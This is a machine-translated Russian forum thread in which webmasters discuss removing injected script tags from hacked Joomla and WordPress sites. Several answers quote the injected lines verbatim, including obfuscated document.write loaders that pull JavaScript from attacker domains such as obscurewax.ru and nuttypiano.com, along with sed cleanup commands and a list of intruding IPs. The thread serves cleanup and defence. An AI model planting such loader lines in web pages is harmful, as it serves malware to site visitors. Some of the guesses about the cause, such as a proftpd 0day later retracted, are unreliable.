Как я могу удалить вирус script из моего script

Ответ 1

Изменить 25-авг:
Конкретные домены и записи добавлены (ниже)
Новый домен nuttypiano.com замечен.

Изменить:
Догадаться. это было определенно Filezilla siphoning моих FTP-паролей.
Следите за файлом и файлом .htaccess - они, похоже, меняются на 777.

Случилось и со мной. Он взял все пароли из программы FTP, а затем изменил файлы PHP и js, чтобы добавить строку

< script type = "text/javascript" src= "http://obscurewax.ru/ Queue.js" >

В основном индексы. * файлы нацелены на другие файлы, предназначенные для файлов *.js.

Я считаю, что имя файла end js меняется, но вы можете отслеживать его из домена obscurewax.ru.

У меня около 8-10 сайтов, где это произошло. На большинстве моих веб-сайтов работает joomla. В том, что я наблюдал пока, он любит нацеливать файлы, которые начинаются со слова индекс.

В установке joomla было затронуто около 122 файлов, почти все они были в: joomla_install/administrator
папку.

Его боль, чтобы загрузить установку joomla с сервера, потому что ее где-то около 4-5 тысяч файлов. Тем не менее, стратегия, которой я следую, такова.

Загрузите весь сайт в папку, запустите текстовый поиск (я использую TextCrawler) для: obscurewax.ru

Обратите внимание на количество файлов и папок, у которых есть это, и, что еще важнее, обратите внимание на все изменения имен файлов js.

Сделайте поиск и замените для всех изменений файла .js, например:

< script type = "text/javascript" src= "http://obscurewax.ru/Queue.js" >
< script type = "text/javascript" src="http://obscurewax.ru/Cablemodem.js " >
< script type = "text/javascript" src="http://obscurewax.ru/Kilobyte.js " >

В файлах .js вы также найдете этот тип кода:

document.write('<s'+'cript type="text/javascript" 
src="http://obscurewax.ru/AGP.js"></scr'+'ipt>'); // Found in .js files

Замените все ничем ('').
Другое дело, что вы можете сделать: obscurewax.ru с example.com

У меня нет быстрого и простого способа удалить код в комментариях ниже (что, я думаю, они используют для целей отслеживания.) - но я думаю, что если вы удалите ссылку script, этот комментарий не причинит вам вреда.

Разные домены:

Определенные строки для поиска:

<script type="text/javascript" src="http://obscurewax.ru/Beta_Software.js"></script>
<script type="text/javascript" src="http://riotassistance.ru/Undo.js"></script>
* Contributed by Open Web Technologies <http://openwebtech.ru/>
Denis125 <[email protected]>
// Author: Andrei Blagorazumov, [email protected]
document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/Undo.js"></scri'+'pt>');
document.write('<s'+'cript type="text/javascript" src="http://obscurewax.ru/Beta_Software.js"></scr'+'ipt>');
<script type="text/javascript" src="http://nuttypiano.com/Hard_Copy.js"></script>
<script type="text/javascript" src="http://nuttypiano.com/Facebook.js"></script>
document.write('<s'+'cript type="text/javascript" src="http://nuttypiano.com/Facebook.js"></scri'+'pt>');

Примечание: Иногда вы не сможете увидеть эту ссылку в своем html в источнике, но файлы загружаются из-за ее скрытия в одном из JavaScripts. Хороший способ убедиться, что вы действительно чисты, - это фактически войти и увидеть файлы .js, которые загружаются во время загрузки вашей страницы, и проверить, не загружаются ли какие-либо файлы .js из подозрительного домена. Легкий способ сделать это - зайти в инструменты разработчика в chrome (ctrl + shift + i) Здесь на вкладке ресурсов вы увидите фильтр сценариев, используя это, вы можете отслеживать загрузку всех файлов .js, пока загружается ваша страница. Плагин firebug в firefox также позволит вам увидеть эту информацию. Если на вашем веб-сайте есть несколько частей (front-end, back-end), вы хотите посетить все части веб-сайта и проверить, не загружены ли какие-либо подозрительные файлы .js.

Очень важно

Это самое худшее, что может случиться с веб-разработчиком. Эта атака обычно выполняется путем обмана жертвы (вы и я), чтобы полагать, что в программе есть обновление для программы FTP, как только вы установите обновление - ваши сайты будут затронуты.

Я работаю над этим сейчас. Если у вас есть лучшие/более короткие способы сделать это. Поделись, пожалуйста. Спасибо!

Ответ 2

У меня есть сайт клиентов, который был взломан с помощью строки кода от obscurewax.ru. Сайт размещен на общем хостинге GoDaddy. Похоже, вчера они отредактировали несколько файлов на сервере.

Мы не знаем, как они вошли на сайт, но они врезались в веб-сайт. Мы сейчас собираемся и удаляем все в начале, поскольку мы не уверены в том, где они оставили файлы для начала.

Они оставили эту строку кода - obscurewax.ru/Heat_Sink.js

Что ничего не делает, но я не рискую. Согласно whois, домен был куплен всего три дня назад, а информация закрыта. Если бы это был хостинг-провайдер, он был бы публичным. Его размещение в России и на веб-сайтах в США, я вижу это как красный флаг. Я думаю, что они строят свою сеть и активируют скрипты, как только у них будет достаточно свободного места.

Надеюсь, что это поможет.

Ответ 3

• Кто ваш хостинг-провайдер? Некоторые хосты вставляют код (обычно рекламные баннеры для бесплатных сайтов, но не всегда) на вашу веб-страницу на лету. Если у вас есть такой хост, я рекомендую получить другой.

  Никогда не относитесь к вирусу, что может быть связано с бесплатным веб-хостом;)

• Действительно ли это URL-адрес script, который вставлен на ваши страницы? Потому что это пустой файл.

Ответ 4

Хммм.. Кажется, что это proftpd 0day. Пара клиентов сообщила о проблеме на своих сайтах. На сервере был установлен proftpd 1.3.1. Что касается файлов журналов, то злоумышленники использовали только имена пользователей, а не пароли. После успешного угадывания имени входа (например, в отношении имени домена сайта) у них не было проблем с регистрацией... Плохо, надеюсь, что обновление до 1.3.3 исправит его.

Если вы используете Linux-сервер, здесь есть 2 быстрых фрагмента консоли для исправления сайтов после атаки с использованием obscurewax:

    cd /to/site/webroot
find ./ -type f -exec sed -i "s/document.write('<s'+'cript type=\"text\/javascript\" src=\"http:\/\/obscurewax.ru\/Google.js\"><\/scr'+'ipt>')//g" {} \
find ./ -type f -exec sed -i 's/<script type="text\/javascript" src="http:\/\/obscurewax.ru\/Google.js"><\/script>//g' {} \;

Не забудьте заменить Google.js вашим вариантом ссылки злоумышленника.

UPDATE

Профтпд чист. После некоторого расследования я нашел настоящую причину, и это просто прозаично. Один из ведущих хостинг-менеджеров держал логин/пароли многих пользователей ftp в своей Filezilla на рабочем столе Windows. Все пароли, которые он хранил, были украдены третьей стороной.

Ответ 5

У меня такая же проблема на моем сайте. Они изменили все .js файлы и добавили эту строку кода в конец. Проблема в том, что я не могу найти, как они это сделали.

Ответ 6

Может ли это быть какие-то компоненты/плагины, которые не обновляются? Как насчет того, чтобы составить список наших компонентов, чтобы увидеть, есть ли у нас одни и те же самые, и может ли это проклятие этого взлома?

Мой список: (компоненты) Вложения
Баннеры включены 1.5.0 апреля 2006 г. Joomla! Проект
CSV Improved Enabled 1.7 22 мая 2009 г. RolandD Cyber ​​Produksi
CSVI VirtueMart Enabled 2.0.1 28 ноября 2009 г. RolandD Cyber ​​Produksi
docman Enabled 1.4.0.stable Февраль 2009 г. Joomlatools
Легкий поиск включен 0.1.0 Ноябрь 2008 Hiro Nozu
easysql Включено 1.27 30/11/2006 Serebro
FrontpagePlus отключен 0.1.0 Январь 2009 NoNumber! (Питер ван Вестен)
gk3_tabs_manager Отключено 3.0.2 31/05/2009 Gavick.com
JCE Enabled 157 23 июня 2009 г. Райан Деммер
JCrawler Enabled 1.7 Beta 20/4/2009 Патрик Винклер
JoomlaPack Enabled 2.4 2009-12-05 Разработчики JoomlaPack
K2 Enabled 2.1 9 сентября 2009 г. JoomlaWorks
Linkr Enabled 2.3.6 апреля 2008 г. Frank
Новостные ленты включены 1.5.0 апреля 2006 г. Joomla! Проект
Опросы включены 1.5.0 Июль 2004 Joomla! Проект
Nova Enabled 1.7.5 Февраль 2010 ProJoom
pjinstaller Enabled 1.0.8 Январь 2010 ProJoom
QContacts Disabled 1.0.3 Июль 2008 Massimo Giagnoni
QuickFAQ Enabled 1.0.3 01/02/2009 Christoph Lukes
redlinker Enabled 1.0b11 09/09/2009 Redweb.dk
redVMPRODUCTFINDER Включено 1.10 21/01/2010 Redweb.dk
RokCandy Disabled 0.82a 31 января 2009 г. RocketWerx, LLC
RokModule включен 1.1 июня 2008 г. RocketTheme
forme Enabled 1.0.4 07/02/2008 www.rsjoomla.com
RSform Enabled 1.2.0 17/06/2009 www.rsjoomla.com
rsinstaller Enabled 1.0.0 04/06/2009 www.rsjoomla.com
sh404sef Enabled 1.0.16_Beta 2 января 2009 г. Yannick Gaultier
VirtueMart Enabled 1.1.4 16.10.2009 Команда разработчиков VirtueMart
vmemails Enabled 1.0.4b182 2009-11-28 InteraMind Advanced Analytics
Weblinks Enabled 1.5.0 апреля 2006 г. Joomla! Проект
Xmap

Примечание: 2 месяца назад я полностью очистил свой компьютер, изменил все пароли на сервере и на веб-сайте. Это только работало до тех пор, пока вирус не вернулся, , поэтому я очень хорошо понимаю, что это компонент, модуль, плагин, который находится во время повреждения. Да, вы можете сделать все, что захотите, но проблема вернется!

Ответ 7

Я просто наткнулся на это; Это довольно недавний инцидент. Я думал, что мой сайт был единственным. Я заметил, что этот script всегда загружался всякий раз, когда я обращался к моему сайту; Я запускал CMS, но теперь я закрыл его. Что касается предложения об уязвимости в FTP, посчитайте меня из этого, так как я никогда не использовал FTP. Я просто отключил раздел CMS, потому что даже после запуска новой установки последней версии CMS еще один вредоносный script по-прежнему загружался при доступе к сайту. Это заставило меня прийти к выводу, что мои серверы веб-хостинга, возможно, уже были скомпрометированы. Другие вредоносные сценарии, которые атаковали мою CMS, включают в себя:

• pocketbloke.ru
• yumeye.ru и
• microlightning.ru

P.S: Файл My.htaccess также был изменен, и права на файлы для моей CMS были полностью изменены на 777. Может ли это быть уязвимость cPanel, используемая этими хакерами?

Ответ 8

Начните с изменения FTP или любых других паролей удаленного доступа и проверьте свой компьютер/сервер на наличие вирусов. Что-то/кто-то добавляет это автоматически ко всем вашим файлам. Затем вы можете использовать любой инструмент для замены текстового текста, например http://tools.tortoisesvn.net/grepWin, чтобы найти эту строку во всех файлах и удалить их (путем замены пустым линия).

UPDATE

Я пропустил вашу строку о том, что вы не видите эту строку в своем источнике файлов. Просто проверьте остальную часть файла и проверьте все JS файлы - они должны включать небольшую часть мини-кода, который добавляет эту строку. Вы также можете попытаться найти все свои файлы локально или с помощью каких-либо инструментов разработчика браузеров, чтобы найти, где упоминается тот же URL-адрес или часть.

Ответ 9

Weird. Я получил то же самое в одном из моих клиентов index.html с кучей других таинственных файлов. Возможно, они попали в его FTP. из моих 50 других клиентов, никто другой не был выполнен, кажется.

После проверки случайным пользователям удалось получить доступ к FTP некоторое время. здесь был уникальный список IP-адресов, которые, как я знаю, не являются

137.149.150.100
173.35.246.173
174.143.242.47
188.229.31.45
188.24.43.62
188.25.239.153
188.25.73.186
189.28.154.133
198.145.116.71
198.63.210.170
203.81.55.153
208.101.102.60
209.239.120.50
212.189.180.1
213.142.137.131
217.27.224.7
68.45.8.194
69.143.233.198
70.38.11.176
70.81.249.108
74.58.67.48
76.104.123.11
78.159.45.198
78.245.136.34
78.251.215.23
78.94.44.177
79.112.216.109
79.114.26.35
79.117.237.130
79.136.32.209
81.66.237.244
81.82.154.174
81.82.52.12
82.234.154.97
82.247.130.26
82.36.17.105
83.84.225.144
84.196.204.172
85.136.145.183
85.139.199.26
85.28.76.190
86.60.215.133
87.244.217.188
87.247.251.44
87.59.67.145
88.162.127.32
88.207.7.151
89.114.92.59
89.46.96.87
89.47.179.66
91.147.207.215
91.65.157.38
92.249.196.99
94.141.145.147
94.227.112.143
95.79.22.165
99.226.133.161

Похоже, какая-то массовая атака. Я бы посмотрел метку времени на файлы, которые были изменены, посмотрите, закрыты ли они, или если кто-либо из ваших других ftp-пользователей вошел в систему с этими IP-адресами. Просто хочу отметить, что я запускаю сервер debian linux с proftpd...

У меня возникло странное сообщение об ошибке при попытке отредактировать файл в winSCP с помощью notepad2... поэтому он выглядит как какой бы то ни было код, испортил типичные текстовые редакторы. Я смог записать файл и удалить ссылки.

PS: Я узнал об этом, когда google отправил мне по электронной почте "Уважаемый владелец сайта или веб-мастер [censored].com, Недавно мы обнаружили, что некоторые из ваших страниц могут привести к заражению пользователей вредоносным программным обеспечением. Мы начали показывать страницу предупреждения пользователям, которые посещают эти страницы, нажав на результат поиска на сайте Google.com.

Ответ 10

Обнаружена такая же проблема сегодня. Я удалил все строки из js вручную. Они становятся умнее. Моя строка:

document.write('<s'+'cript type="text/javascript" src="http://obscurewax.ru/Scroll_Wheel.js"></scr'+'ipt>');

Ответ 11

Вредоносная программа заражает ПК с сохраненными паролями ftp. Затем он автоматически берет пароли и регистрирует и заражает веб-сайт. Найдите 2 недавно измененных файла в каталоге c:\windows\system32\drivers Вероятно, они являются виновниками.

Ответ 12

Вот script, найденный на моем сайте Google. Google заблокировал мой сайт из-за "вредоносных программ"

Я пытался "Word Press" и тему, которую я заплатил, "The Local". Это, на мой взгляд, единственный путь, который мог бы добавить этот script. Я удалил все сценарии Word Press и The Local, и теперь Google не обнаруживает вредоносное ПО на моем сайте.

Мое решение - удалить все сценарии, которые я упомянул, и заменить все на стандартный HTML. Другие скрипты были в основном всего PHP, и я считаю, что HTML будет намного более стабильным.

Удача